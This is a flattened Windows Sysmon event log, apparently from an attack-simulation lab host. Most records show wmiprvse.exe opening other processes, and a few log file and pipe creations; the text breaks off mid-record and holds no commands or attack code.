16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71B04C4F959FEDE183B2D5A50F08C8DF,SHA256=5DDF918C1AFA01E7B8903B88A89C9B8DD6B74146A766B8A3ACA2CAB3AC717475,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.639{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264\PSHost.132591776824805702.14264.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla 